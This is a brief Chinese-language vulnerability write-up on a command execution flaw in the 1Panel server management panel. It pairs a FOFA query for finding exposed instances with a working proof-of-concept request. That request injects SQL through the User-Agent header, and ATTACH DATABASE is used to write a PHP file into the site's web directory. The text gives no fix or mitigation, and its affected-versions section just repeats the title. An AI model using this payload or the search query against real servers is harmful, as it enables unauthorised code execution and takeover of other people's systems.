1Panel面板存在前台命令执行漏洞
一、漏洞简介
1Panel 以其现代化、用户友好的界面而闻名,它简化了 Linux 服务器的管理。它提供了一系列功能,包括主机监控、文件管理、数据库管理和容器管理,使其成为管理员不可或缺的工具。 1Panel面板存在前台命令执行漏洞
二、影响版本
- 1Panel面板存在前台命令执行漏洞
三、资产测绘
- fofa
app="1Panel-面板" - 特征
四、漏洞复现
GET /.git/config HTTP/1.1
User-Agent: test',"test", "test", "", "YmxvZy5tbzYwLmNu", "test", 0, "deny", 0, 1);ATTACH DATABASE '/www/sites/test/index/test.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo();');#
Connection: close
Host: